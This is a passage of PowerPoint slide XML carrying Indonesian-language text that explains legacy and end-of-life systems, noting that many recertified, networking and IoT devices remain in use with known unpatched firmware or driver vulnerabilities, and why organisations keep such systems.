              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berstatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem-sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periferal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> driver dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaikinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di pasar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaharui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet of Things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekurangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pimpinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Istilah "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
